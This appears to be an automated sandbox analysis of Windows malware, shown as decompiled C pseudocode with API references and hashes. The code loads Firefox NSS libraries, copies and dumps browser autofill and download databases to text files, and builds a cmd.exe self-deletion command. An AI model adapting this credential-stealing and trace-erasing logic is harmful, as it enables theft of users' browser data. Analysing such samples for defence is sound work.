					HeapAlloc(GetProcessHeap(), 0, _v80);
					_t164 =  *0x453c90; // 0x25c8830
					E004095C0(0, _v80, _t193, 0x10, _t164, _v380, _t193);
					_t216 = _t214 + 0x20;
					_v8 = 0;
					_t231 = _v28 - 0x10;
					if(_v28 >= 0x10) {
						_push(_v48);
						E0042A289();
						_t216 = _t216 + 4;
					}
					_t126 = E0040D100(_t231,  &_v48,  &_v76, "mozglue.dll");
					_t217 = _t216 + 0xc;
					_v8 = 5;
					if( *((intOrPtr*)(_t126 + 0x14)) < 0x10) {
						_t194 = _t126;
					} else {
						_t194 =  *_t126;
					}
					_t166 =  *0x453c90; // 0x25c8830
					_v380 = 0;
					E00407540(_t166, "mozglue.dll", 1,  &_v380,  &_v376);
					HeapAlloc(GetProcessHeap(), 0, _v80);
					_t167 =  *0x453c90; // 0x25c8830
					E004095C0(0, _v80, _t194, 0x10, _t167, _v380, _t194);
					_t219 = _t217 + 0x20;
					_v8 = 0;
					_t233 = _v28 - 0x10;
					if(_v28 >= 0x10) {
						_push(_v48);
						E0042A289();
						_t219 = _t219 + 4;
					}
					_t134 = E0040D100(_t233,  &_v48,  &_v76, "freebl3.dll");
					_t220 = _t219 + 0xc;
					_v8 = 6;
					if( *((intOrPtr*)(_t134 + 0x14)) < 0x10) {
						_t195 = _t134;
					} else {
						_t195 =  *_t134;
					}
					_t169 =  *0x453c90; // 0x25c8830
					_v380 = 0;
					E00407540(_t169, "freebl3.dll", 1,  &_v380,  &_v376);
					_t171 = _v80;
					HeapAlloc(GetProcessHeap(), 0, _v80);
					_t170 =  *0x453c90; // 0x25c8830
					_t90 = E004095C0(0, _v80, _t195, 0x10, _t170, _v380, _t195);
					_t203 = _t220 + 0x20;
					if(_v28 >= 0x10) {
						_t171 = _v48;
						_push(_v48);
						_t90 = E0042A289();
						_t203 = _t203 + 4;
					}
					 *0x453cfc = 1;
				}
				if(_v56 >= 0x10) {
					_push(_v76);
					_t90 = E0042A289();
				}
				 *[fs:0x0] = _v16;
				_pop(_t189);
				_pop(_t199);
				_pop(_t147);
				return E0042A36A(_t90, _t147, _v20 ^ _t200, _t171, _t189, _t199);
			}

0x0040eb83
0x0040eb85
0x0040eb90
0x0040eb97
0x0040eb9c
0x0040eb9e
0x0040eba4
0x0040eba8
0x0040ebae
0x0040ebb8
0x0040ebbf
0x0040ebc2
0x0040ebc5
0x0040ebca
0x0040ebd2
0x0040ebd7
0x0040ebdd
0x0040ebe3
0x0040ebf6
0x0040ebfb
0x0040ebfe
0x0040ec05
0x0040ec0b
0x0040ec07
0x0040ec07
0x0040ec07
0x0040ec0d
0x0040ec29
0x0040ec2f
0x0040ec43
0x0040ec4f
0x0040ec58
0x0040ec5d
0x0040ec60
0x0040ec63
0x0040ec66
0x0040ec6b
0x0040ec6c
0x0040ec71
0x0040ec71
0x0040ec81
0x0040ec86
0x0040ec89
0x0040ec90
0x0040ec96
0x0040ec92
0x0040ec92
0x0040ec92
0x0040ec98
0x0040ecb4
0x0040ecba
0x0040ecce
0x0040ecda
0x0040ece3
0x0040ece8
0x0040eceb
0x0040ecee
0x0040ecf1
0x0040ecf6
0x0040ecf7
0x0040ecfc
0x0040ecfc
0x0040ed0c
0x0040ed11
0x0040ed14
0x0040ed1b
0x0040ed21
0x0040ed1d
0x0040ed1d
0x0040ed1d
0x0040ed23
0x0040ed3f
0x0040ed45
0x0040ed59
0x0040ed65
0x0040ed6e
0x0040ed73
0x0040ed76
0x0040ed79
0x0040ed7c
0x0040ed81
0x0040ed82
0x0040ed87
0x0040ed87
0x0040ed97
0x0040ed9c
0x0040ed9f
0x0040eda6
0x0040edac
0x0040eda8
0x0040eda8
0x0040eda8
0x0040edae
0x0040edca
0x0040edd0
0x0040ede4
0x0040edf0
0x0040edf9
0x0040edfe
0x0040ee01
0x0040ee04
0x0040ee07
0x0040ee0c
0x0040ee0d
0x0040ee12
0x0040ee12
0x0040ee22
0x0040ee27
0x0040ee2a
0x0040ee31
0x0040ee37
0x0040ee33
0x0040ee33
0x0040ee33
0x0040ee39
0x0040ee55
0x0040ee5b
0x0040ee6f
0x0040ee7b
0x0040ee84
0x0040ee89
0x0040ee8c
0x0040ee8f
0x0040ee92
0x0040ee97
0x0040ee98
0x0040ee9d
0x0040ee9d
0x0040eead
0x0040eeb2
0x0040eeb5
0x0040eebc
0x0040eec2
0x0040eebe
0x0040eebe
0x0040eebe
0x0040eec4
0x0040eee0
0x0040eee6
0x0040eeeb
0x0040eefa
0x0040ef06
0x0040ef0f
0x0040ef14
0x0040ef1a
0x0040ef1c
0x0040ef1f
0x0040ef20
0x0040ef25
0x0040ef25
0x0040ef28
0x0040ef28
0x0040ef35
0x0040ef3a
0x0040ef3b
0x0040ef40
0x0040ef46
0x0040ef4e
0x0040ef4f
0x0040ef50
0x0040ef5e

APIs

_strlen.LIBCMT ref: 0040EBC5

Part of subcall function 0040D100: _strlen.LIBCMT ref: 0040D14E
Part of subcall function 0040D100: _strlen.LIBCMT ref: 0040D195

GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,025C13D0,00000000), ref: 0040EC3C
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,025C13D0,00000000), ref: 0040EC43
GetProcessHeap.KERNEL32(00000000,?), ref: 0040ECC7
HeapAlloc.KERNEL32(00000000), ref: 0040ECCE
GetProcessHeap.KERNEL32(00000000,?), ref: 0040ED52
HeapAlloc.KERNEL32(00000000), ref: 0040ED59
GetProcessHeap.KERNEL32(00000000,?), ref: 0040EDDD
HeapAlloc.KERNEL32(00000000), ref: 0040EDE4
GetProcessHeap.KERNEL32(00000000,?), ref: 0040EE68
HeapAlloc.KERNEL32(00000000), ref: 0040EE6F
GetProcessHeap.KERNEL32(00000000,?), ref: 0040EEF3
HeapAlloc.KERNEL32(00000000), ref: 0040EEFA

Strings

nss3.dll, xrefs: 0040ECFF, 0040ED39
softokn3.dll, xrefs: 0040EC74, 0040ECAE
vcruntime140.dll, xrefs: 0040EBE9, 0040EC23
freebl3.dll, xrefs: 0040EEA0, 0040EEDA
mozglue.dll, xrefs: 0040EE15, 0040EE4F
msvcp140.dll, xrefs: 0040ED8A, 0040EDC4

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Heap$AllocProcess$_strlen
String ID: freebl3.dll$mozglue.dll$msvcp140.dll$nss3.dll$softokn3.dll$vcruntime140.dll
API String ID: 616021271-1377252038
Opcode ID: 5f633ef6626c36c717cac27d955d279686a18ec2189f0348d48a1c03f8894733
Instruction ID: ba3b968b8513490984caba56c9768b6af40bfca255e94f7f2fc77710d7fd2006
Opcode Fuzzy Hash: 5f633ef6626c36c717cac27d955d279686a18ec2189f0348d48a1c03f8894733
Instruction Fuzzy Hash: C3C1C2B2D00214EFDB00DFA4DC85EDE7778AB84708F14456EF50977282DA399A44CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD50 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 279
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040AD50(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v280;
				char _v540;
				char _v800;
				char _v1800;
				intOrPtr _v1808;
				char _v1812;
				char _v1828;
				intOrPtr _v1836;
				char _v1840;
				char _v1856;
				intOrPtr _v1864;
				char _v1868;
				char _v1884;
				char _v1912;
				char _v1913;
				char _v1920;
				char _v1924;
				char _v1928;
				char _v1932;
				intOrPtr _v1936;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t98;
				signed int _t99;
				intOrPtr _t111;
				void* _t113;
				intOrPtr* _t116;
				void* _t119;
				void* _t122;
				void* _t131;
				char* _t137;
				void* _t138;
				intOrPtr* _t142;
				intOrPtr _t145;
				intOrPtr* _t151;
				void* _t158;
				void* _t160;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t206;
				void* _t207;
				void* _t208;
				void* _t210;
				void* _t212;
				intOrPtr _t213;
				signed int _t214;
				void* _t215;
				void* _t218;
				void* _t221;

				_t98 =  *0x451f00; // 0xc21d6f0a
				_t99 = _t98 ^ _t214;
				_v20 = _t99;
				 *[fs:0x0] =  &_v16;
				_t211 = _a4;
				_v1936 = _a8;
				E0042A2F0( &_v800, 0, 0x104);
				E0042A2F0( &_v280, 0, 0x104);
				_v1920 = 0;
				_v1924 = 0;
				 *0x464860( &_v800, E00420650(0, _t206, _a4, 0x1a), _t99, _t206, _t210, _t158,  *[fs:0x0], E0043DFC2, 0xffffffff);
				_t162 =  *0x453698; // 0x25c8af8
				 *0x464860( &_v800, _t162);
				 *0x464860( &_v280,  &_v800);
				 *0x464860( &_v280, "\\");
				_t111 =  *0x453630; // 0x25c61e8
				 *0x464860( &_v280, _t111);
				_v1808 = 0xf;
				_v1812 = 0;
				_v1828 = 0;
				_t113 = E0042BC70( &_v280);
				_t218 = _t215 - 0x780 + 0x20;
				E00404BC0( &_v1828,  &_v280, _t113);
				_v8 = 0;
				_t116 = E00423960( &_v1913,  &_v1884,  &_v1828);
				_v8 = 1;
				if( *((intOrPtr*)(_t116 + 0x14)) >= 8) {
					_t116 =  *_t116;
				}
				_t207 = E00420590(_t116);
				if(_v1864 >= 8) {
					_push(_v1884);
					E0042A289();
					_t218 = _t218 + 4;
				}
				_v1864 = 7;
				_v1868 = 0;
				_v1884 = 0;
				_v8 = 0xffffffff;
				if(_v1808 >= 0x10) {
					_push(_v1828);
					E0042A289();
					_t218 = _t218 + 4;
				}
				if(_t207 != 0) {
					_t122 = E004199D0(_t207,  &_v280,  &_v1920,  &_v1924);
					_t218 = _t218 + 0xc;
					_t228 = _t122;
					if(_t122 != 0) {
						_v1808 = 0xf;
						_v1812 = 0;
						_v1828 = 0;
						E00404BC0( &_v1828, _t211, E0042BC70(_t211));
						_v8 = 2;
						E00423E90(_t207, _t228,  &_v1856,  &_v1828);
						_t221 = _t218 + 0xc;
						_v8 = 4;
						if(_v1808 >= 0x10) {
							_push(_v1828);
							E0042A289();
							_t221 = _t221 + 4;
						}
						_v1808 = 0xf;
						_v1812 = 0;
						_v1828 = 0;
						E0042A2F0( &_v540, 0, 0x104);
						_t177 =  *0x45336c; // 0x25c8d38
						 *0x464860( &_v540, _t177);
						_t131 = E0042BC70( &_v540);
						_t218 = _t221 + 0x10;
						if(E0040A2A0( &_v1856,  &_v540, 0, _t131) != 0xffffffff) {
							E00404410( &_v1856, 0, _t132 + 0xc);
							E00404410( &_v1856, 0x8c, 0xffffffff);
							_t137 = _v1856;
							if(_v1836 < 0x10) {
								_t137 =  &_v1856;
							}
							_t138 = E00414FC0(_t137,  &_v1932,  &_v1928);
							_t218 = _t218 + 0xc;
							if(_t138 != 0) {
								E0042A2F0( &_v1800, 0, 0x3e8);
								_t142 = E0041A2B0( &_v1884, _v1932, _v1928, _v1920, _v1924);
								_t218 = _t218 + 0x20;
								_v8 = 5;
								if( *((intOrPtr*)(_t142 + 0x14)) >= 0x10) {
									_t142 =  *_t142;
								}
								 *0x464860( &_v1800, _t142);
								_v8 = 4;
								E0040A450( &_v1884);
								_t145 =  *0x4537fc; // 0x25c8d68
								_t213 = _v1936;
								 *0x464860(_t213, _t145);
								_push("NULL");
								_push( &_v1800);
								if( *0x464890() != 0) {
									_t151 = E0041A2B0( &_v1912, _v1932, _v1928, _v1920, _v1924);
									_t218 = _t218 + 0x14;
									_v8 = 6;
									if( *((intOrPtr*)(_t151 + 0x14)) >= 0x10) {
										_t151 =  *_t151;
									}
									 *0x464860(_t213, _t151);
									_v8 = 4;
									E0040A450( &_v1912);
								}
								 *0x464860(_t213, "\n");
							}
						}
						_v8 = 0xffffffff;
						if(_v1836 >= 0x10) {
							_push(_v1856);
							E0042A289();
							_t218 = _t218 + 4;
						}
						_v1836 = 0xf;
						_v1840 = 0;
						_v1856 = 0;
					}
				}
				_t119 = E004150C0( &_v1920,  &_v1924);
				 *[fs:0x0] = _v16;
				_pop(_t208);
				_pop(_t212);
				_pop(_t160);
				return E0042A36A(_t119, _t160, _v20 ^ _t214,  &_v1924, _t208, _t212);
			}

0x0040ad67
0x0040ad6c
0x0040ad6e
0x0040ad78
0x0040ad81
0x0040ad93
0x0040ad99
0x0040adab
0x0040adb2
0x0040adb8
0x0040adce
0x0040add4
0x0040ade2
0x0040adf6
0x0040ae08
0x0040ae0e
0x0040ae1b
0x0040ae28
0x0040ae32
0x0040ae38
0x0040ae3e
0x0040ae43
0x0040ae54
0x0040ae6d
0x0040ae70
0x0040ae79
0x0040ae7d
0x0040ae7f
0x0040ae7f
0x0040ae94
0x0040ae96
0x0040ae9e
0x0040ae9f
0x0040aea4
0x0040aea4
0x0040aeb0
0x0040aeba
0x0040aec0
0x0040aec7
0x0040aece
0x0040aed6
0x0040aed7
0x0040aedc
0x0040aedc
0x0040aee1
0x0040aefc
0x0040af01
0x0040af04
0x0040af06
0x0040af0d
0x0040af17
0x0040af1d
0x0040af33
0x0040af46
0x0040af4d
0x0040af52
0x0040af5a
0x0040af64
0x0040af6c
0x0040af6d
0x0040af72
0x0040af72
0x0040af82
0x0040af8c
0x0040af92
0x0040af98
0x0040af9d
0x0040afae
0x0040afbb
0x0040afc0
0x0040afda
0x0040afeb
0x0040affd
0x0040b002
0x0040b00e
0x0040b010
0x0040b010
0x0040b025
0x0040b02a
0x0040b02f
0x0040b042
0x0040b06a
0x0040b06f
0x0040b072
0x0040b079
0x0040b07b
0x0040b07b
0x0040b085
0x0040b091
0x0040b095
0x0040b09a
0x0040b09f
0x0040b0a7
0x0040b0ad
0x0040b0b8
0x0040b0c1
0x0040b0e6
0x0040b0eb
0x0040b0ee
0x0040b0f5
0x0040b0f7
0x0040b0f7
0x0040b0fb
0x0040b107
0x0040b10b
0x0040b10b
0x0040b116
0x0040b116
0x0040b02f
0x0040b11c
0x0040b129
0x0040b131
0x0040b132
0x0040b137
0x0040b137
0x0040b13a
0x0040b144
0x0040b14a
0x0040b14a
0x0040af06
0x0040b15e
0x0040b169
0x0040b171
0x0040b172
0x0040b173
0x0040b181

APIs

_memset.LIBCMT ref: 0040AD99
_memset.LIBCMT ref: 0040ADAB

Part of subcall function 00420650: _memset.LIBCMT ref: 00420671
Part of subcall function 00420650: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0042068A

lstrcat.KERNEL32(?,00000000), ref: 0040ADCE
lstrcat.KERNEL32(?,025C8AF8), ref: 0040ADE2
lstrcat.KERNEL32(?,?), ref: 0040ADF6
lstrcat.KERNEL32(?,00443C68), ref: 0040AE08
lstrcat.KERNEL32(?,025C61E8), ref: 0040AE1B
_strlen.LIBCMT ref: 0040AE3E

Part of subcall function 00423960: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,0040AE75,?,?,?), ref: 0042398E
Part of subcall function 00423960: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 004239C4
Part of subcall function 00423960: _wcslen.LIBCMT ref: 004239E1

_strlen.LIBCMT ref: 0040AF23
_memset.LIBCMT ref: 0040AF98
lstrcat.KERNEL32(?,025C8D38), ref: 0040AFAE
_strlen.LIBCMT ref: 0040AFBB

Part of subcall function 00414FC0: CryptStringToBinaryA.CRYPT32(C,00000000,00000001,00000000,00419ABE,00000000,00000000), ref: 00414FE7
Part of subcall function 00414FC0: LocalAlloc.KERNEL32(00000040,00000000,?,00419ABE,000000FF,0043EEE8,00000000,00000000,?,?,?,C21D6F0A,?,00000000,?,0043EEE8), ref: 00414FF6
Part of subcall function 00414FC0: CryptStringToBinaryA.CRYPT32(C,00000000,00000001,00000000,00419ABE,00000000,00000000), ref: 0041500D
Part of subcall function 00414FC0: LocalFree.KERNEL32(?,?,00419ABE,000000FF,0043EEE8,00000000,00000000,?,?,?,C21D6F0A,?,00000000,?,0043EEE8,000000FF), ref: 0041501C

_memset.LIBCMT ref: 0040B042

Part of subcall function 0041A2B0: _memcmp.LIBCMT ref: 0041A302
Part of subcall function 0041A2B0: _memset.LIBCMT ref: 0041A32B
Part of subcall function 0041A2B0: LocalAlloc.KERNEL32(00000040,?), ref: 0041A365

lstrcat.KERNEL32(?,00000000), ref: 0040B085
lstrcat.KERNEL32(?,025C8D68), ref: 0040B0A7
StrCmpCA.SHLWAPI(?,NULL,?,?,?,?,?,?,?,?,000000FF,00000000,-0000000C), ref: 0040B0B9
lstrcat.KERNEL32(?,00000000), ref: 0040B0FB
lstrcat.KERNEL32(?,00443C5C), ref: 0040B116

Strings

NULL, xrefs: 0040B0AD

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memset$Local_strlen$AllocBinaryByteCharCryptMultiStringWide$FolderFreePath_memcmp_wcslen
String ID: NULL
API String ID: 2215791965-324932091
Opcode ID: 75196c8e9249c2f20267304b99533268f47a7a8c24b41caf7e688946fb8da48a
Instruction ID: f355f3dfbd1eb238b77824d700615f4921e93a82704a6a1093c4c9c9a2e291e9
Opcode Fuzzy Hash: 75196c8e9249c2f20267304b99533268f47a7a8c24b41caf7e688946fb8da48a
Instruction Fuzzy Hash: 52B172B1D0421C9BCB51EB55DC85BDAB778EB49304F0045EAE50D63241EB7CAB84CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 004160E0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 150
stringmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E004160E0(CHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v532;
				char _v536;
				void* _v537;
				char _v544;
				intOrPtr _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t36;
				void* _t49;
				long _t53;
				void* _t59;
				intOrPtr _t65;
				intOrPtr _t66;
				void* _t73;
				intOrPtr _t87;
				signed int _t98;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t106;

				_t36 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t36 ^ _t98;
				_t74 = _a12;
				_t95 = _a8;
				_v548 = _a16;
				E0042A2F0( &_v268, 0, 0x104);
				_t87 =  *0x453978; // 0x25c13d0
				 *0x464860( &_v268, _t87);
				 *0x464860( &_v268, E00420520(_t95, _t106, 0x1a));
				CopyFileA(_a4,  &_v268, 1);
				E0042A2F0( &_v528, 0, 0x104);
				wsprintfA( &_v528, "\\Autofill\\%s_%s.txt", _a12, _t95);
				_t97 =  *0x453380; // 0x25c9b18
				_t89 =  &_v544;
				_t49 =  *0x453dbc( &_v268,  &_v544);
				_t101 = _t99 + 0x30;
				if(_t49 == 0) {
					_t53 =  *0x453d68(_v544, _t97, 0xffffffff,  &_v536, _t49);
					_t102 = _t101 + 0x14;
					if(_t53 == 0) {
						_v532 = HeapAlloc(GetProcessHeap(), _t53, 0xf423f);
						_t59 =  *0x453d84(_v536);
						_t104 = _t102 + 4;
						if(_t59 == 0x64) {
							do {
								_t65 =  *0x453da8(_v536, 0);
								_t97 = _t65;
								_t66 =  *0x453da8(_v536, 1);
								_t95 = _t66;
								 *0x464860(_v532, _t65);
								 *0x464860(_v532, "\t");
								 *0x464860(_v532, _t66);
								 *0x464860(_v532, "\n");
								_t73 =  *0x453d84(_v536);
								_t104 = _t104 + 0x14;
							} while (_t73 == 0x64);
						}
						E00429620(_v548,  &_v528, _v532,  *0x464758(_v532));
						E0042A2F0( &_v532, 0, 4);
						_t102 = _t104 + 0x1c;
					}
					 *0x453d88(_v536);
					_t89 = _v544;
					 *0x453dc0(_v544);
				}
				return E0042A36A(DeleteFileA( &_v268), _t74, _v8 ^ _t98, _t89, _t95, _t97);
			}

0x004160e9
0x004160f0
0x004160f7
0x004160ff
0x00416110
0x00416116
0x0041611b
0x0041612c
0x00416147
0x00416157
0x0041616b
0x0041617e
0x00416184
0x0041618a
0x00416198
0x0041619e
0x004161a3
0x004161bb
0x004161c1
0x004161c6
0x004161df
0x004161ec
0x004161f2
0x004161f8
0x00416200
0x00416209
0x00416218
0x0041621a
0x00416223
0x0041622d
0x0041623f
0x0041624d
0x0041625f
0x0041626c
0x00416272
0x00416275
0x00416200
0x0041629d
0x004162ad
0x004162b2
0x004162b2
0x004162bc
0x004162c2
0x004162c9
0x004162cf
0x004162ef

APIs

_memset.LIBCMT ref: 00416116
lstrcat.KERNEL32(?,025C13D0), ref: 0041612C

Part of subcall function 00420520: _malloc.LIBCMT ref: 00420529
Part of subcall function 00420520: GetTickCount.KERNEL32 ref: 00420536
Part of subcall function 00420520: _rand.LIBCMT ref: 00420550
Part of subcall function 00420520: wsprintfA.USER32 ref: 00420565

lstrcat.KERNEL32(?,00000000), ref: 00416147
CopyFileA.KERNEL32(?,?,00000001), ref: 00416157
_memset.LIBCMT ref: 0041616B
wsprintfA.USER32 ref: 0041617E
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004161D2
HeapAlloc.KERNEL32(00000000), ref: 004161D9
lstrcat.KERNEL32(?,00000000), ref: 0041622D
lstrcat.KERNEL32(?,00445E70), ref: 0041623F
lstrcat.KERNEL32(?,00000000), ref: 0041624D
lstrcat.KERNEL32(?,00443C5C), ref: 0041625F
lstrlen.KERNEL32(?), ref: 00416281
_memset.LIBCMT ref: 004162AD
DeleteFileA.KERNEL32(?), ref: 004162D9

Strings

\Autofill\%s_%s.txt, xrefs: 00416178
ZHaZea, xrefs: 004161EC, 0041626C

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memset$FileHeapwsprintf$AllocCopyCountDeleteProcessTick_malloc_randlstrlen
String ID: ZHaZea$\Autofill\%s_%s.txt
API String ID: 708870984-2263976030
Opcode ID: 51c2504dccafdf31656be7882bbdb7d6f9977a1f57be3c510d74bd1cc1bb3887
Instruction ID: 31290bc752b0b7cb99ba30bc8656f19d97b93a8d79cc8c119bee85420dc20751
Opcode Fuzzy Hash: 51c2504dccafdf31656be7882bbdb7d6f9977a1f57be3c510d74bd1cc1bb3887
Instruction Fuzzy Hash: E651957594021CABCB10EFA4DC8DFDA7778BF99701F004599F60993141EAB4EA84CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00415610 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 150
stringmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00415610(CHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a24) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v532;
				char _v536;
				void* _v537;
				char _v544;
				intOrPtr _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t36;
				void* _t49;
				long _t53;
				void* _t59;
				intOrPtr _t65;
				intOrPtr _t66;
				void* _t73;
				intOrPtr _t87;
				signed int _t98;
				void* _t99;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t106;

				_t36 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t36 ^ _t98;
				_t74 = _a12;
				_t95 = _a8;
				_v548 = _a24;
				E0042A2F0( &_v268, 0, 0x104);
				_t87 =  *0x453978; // 0x25c13d0
				 *0x464860( &_v268, _t87);
				 *0x464860( &_v268, E00420520(_t95, _t106, 0x1a));
				CopyFileA(_a4,  &_v268, 1);
				E0042A2F0( &_v528, 0, 0x104);
				wsprintfA( &_v528, "\\Downloads\\%s_%s.txt", _a12, _t95);
				_t97 =  *0x453b60; // 0x25c6698
				_t89 =  &_v544;
				_t49 =  *0x453dbc( &_v268,  &_v544);
				_t101 = _t99 + 0x30;
				if(_t49 == 0) {
					_t53 =  *0x453d68(_v544, _t97, 0xffffffff,  &_v536, _t49);
					_t102 = _t101 + 0x14;
					if(_t53 == 0) {
						_v532 = HeapAlloc(GetProcessHeap(), _t53, 0xf423f);
						_t59 =  *0x453d84(_v536);
						_t104 = _t102 + 4;
						if(_t59 == 0x64) {
							do {
								_t65 =  *0x453da8(_v536, 0);
								_t97 = _t65;
								_t66 =  *0x453da8(_v536, 1);
								_t95 = _t66;
								 *0x464860(_v532, _t65);
								 *0x464860(_v532, "\n");
								 *0x464860(_v532, _t66);
								 *0x464860(_v532, "\n\n");
								_t73 =  *0x453d84(_v536);
								_t104 = _t104 + 0x14;
							} while (_t73 == 0x64);
						}
						E00429620(_v548,  &_v528, _v532,  *0x464758(_v532));
						E0042A2F0( &_v532, 0, 4);
						_t102 = _t104 + 0x1c;
					}
					 *0x453d88(_v536);
					_t89 = _v544;
					 *0x453dc0(_v544);
				}
				return E0042A36A(DeleteFileA( &_v268), _t74, _v8 ^ _t98, _t89, _t95, _t97);
			}

0x00415619
0x00415620
0x00415627
0x0041562f
0x00415640
0x00415646
0x0041564b
0x0041565c
0x00415677
0x00415687
0x0041569b
0x004156ae
0x004156b4
0x004156ba
0x004156c8
0x004156ce
0x004156d3
0x004156eb
0x004156f1
0x004156f6
0x0041570f
0x0041571c
0x00415722
0x00415728
0x00415730
0x00415739
0x00415748
0x0041574a
0x00415753
0x0041575d
0x0041576f
0x0041577d
0x0041578f
0x0041579c
0x004157a2
0x004157a5
0x00415730
0x004157cd
0x004157dd
0x004157e2
0x004157e2
0x004157ec
0x004157f2
0x004157f9
0x004157ff
0x0041581f

APIs

_memset.LIBCMT ref: 00415646
lstrcat.KERNEL32(?,025C13D0), ref: 0041565C

Part of subcall function 00420520: _malloc.LIBCMT ref: 00420529
Part of subcall function 00420520: GetTickCount.KERNEL32 ref: 00420536
Part of subcall function 00420520: _rand.LIBCMT ref: 00420550
Part of subcall function 00420520: wsprintfA.USER32 ref: 00420565

lstrcat.KERNEL32(?,00000000), ref: 00415677
CopyFileA.KERNEL32(?,?,00000001), ref: 00415687
_memset.LIBCMT ref: 0041569B
wsprintfA.USER32 ref: 004156AE
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00415702
HeapAlloc.KERNEL32(00000000), ref: 00415709
lstrcat.KERNEL32(?,00000000), ref: 0041575D
lstrcat.KERNEL32(?,00443C5C), ref: 0041576F
lstrcat.KERNEL32(?,00000000), ref: 0041577D
lstrcat.KERNEL32(?,004458A8), ref: 0041578F
lstrlen.KERNEL32(?), ref: 004157B1
_memset.LIBCMT ref: 004157DD
DeleteFileA.KERNEL32(?), ref: 00415809

Strings

\Downloads\%s_%s.txt, xrefs: 004156A8
ZHaZea, xrefs: 0041571C, 0041579C

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memset$FileHeapwsprintf$AllocCopyCountDeleteProcessTick_malloc_randlstrlen
String ID: ZHaZea$\Downloads\%s_%s.txt
API String ID: 708870984-3413542198
Opcode ID: 048209e4a28dbb053bc3f06e567873ece6935f8b925cd6d5b0d3565628bd4b28
Instruction ID: 6c387291154a8e6ad238241155172e42f4ea9b42df6807442520a53e9d8f5daf
Opcode Fuzzy Hash: 048209e4a28dbb053bc3f06e567873ece6935f8b925cd6d5b0d3565628bd4b28
Instruction Fuzzy Hash: 6251747594021CABCB10EFA4DC8DFDA7778AF99701F0045A9F60993141EAB4DA84CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00423600 Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 88
stringCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00423600() {
				int _v8;
				char _v16;
				signed int _v20;
				char _v280;
				intOrPtr _v288;
				int _v292;
				char _v308;
				int _v336;
				int _v340;
				int _v344;
				char* _v348;
				char* _v352;
				char* _v356;
				int _v360;
				int _v364;
				char _v368;
				signed int _t32;
				signed int _t33;
				intOrPtr* _t42;
				void* _t51;
				signed int _t61;
				void* _t62;
				void* _t65;

				_t32 =  *0x451f00; // 0xc21d6f0a
				_t33 = _t32 ^ _t61;
				_v20 = _t33;
				 *[fs:0x0] =  &_v16;
				E0042A2F0( &_v280, 0, 0x104);
				E0042A2F0( &_v368, 0, 0x3c);
				 *0x464860( &_v280, "/c ", _t33, _t51,  *[fs:0x0], E0043F9DB, 0xffffffff);
				 *0x464860( &_v280, "timeout /t 6 & del /f /q \"");
				_t42 = E00423560(0,  &_v308, GetCurrentProcessId());
				_t65 = _t62 - 0x160 + 0x20;
				_v8 = 0;
				if( *((intOrPtr*)(_t42 + 0x14)) >= 0x10) {
					_t42 =  *_t42;
				}
				 *0x464860( &_v280, _t42);
				_v8 = 0xffffffff;
				if(_v288 >= 0x10) {
					_push(_v308);
					E0042A289();
					_t65 = _t65 + 4;
				}
				_v288 = 0xf;
				_v292 = 0;
				_v308 = 0;
				 *0x464860( &_v280, "\" & exit");
				_v368 = 0x3c;
				_v364 = 0;
				_v360 = 0;
				_v356 = "open";
				_v352 = "C:\\Windows\\System32\\cmd.exe";
